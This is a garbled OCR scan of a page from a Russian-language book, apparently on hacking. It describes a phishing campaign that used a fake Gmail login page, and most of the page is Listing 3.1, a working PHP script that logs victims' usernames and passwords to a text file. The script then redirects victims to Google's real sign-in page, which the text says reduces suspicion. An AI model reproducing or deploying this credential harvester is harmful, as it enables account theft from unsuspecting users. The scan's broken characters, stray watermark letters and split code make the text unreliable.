 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Googw'ActOl,Юtilof lhfng► •

G м 1! а , •

Рис. 3. 7. Поддельная версия страницы входа в Gmail

Что произошло дальше? Дальше пользователи прочитали письмо, перешли по ссьmке и наивно ввели имя пользователя и пароль, которые бьmи пере­ даны сценарию. Сценарий принимает эти данные и записывает в текстовый файл. Написать такой сценарий сможет любой новичок, владеющий основа­ ми РНР. Примерный код сценария (это не тот сценарий, который использо­

вали мы) приведен в листинге 3.1.

Листинг 3.1. Простейший сценарий записи паролей

<?php

 

 

$login = $_POST['Login'];

// введенный логин

$pass = $

POST['password'];

// Пароль

// Записываем полученные данные

$text = «Login = $login\nPassword = $pass\n»;

$filelog = fopen("log.txt","a+");

// открываем

файл

fwrite($filelog,"\n $text \n");

// записываем строку

fclose($filelog);

// закрываем

 

//перенаправляем пользователю на страницу входа в google,

чтобы

//меньше было подозрений

header('Location: https://accounts.google.com/ServiceLogin?service=mail&passive= true&rm=false&continue=https://mail.google.com/mail/&ss= l&scc= l&ltmpl=default&ltmplcache=2&emr= l&osid= l#identifier ');·

?>

-----------------------------------------------------------------------------------·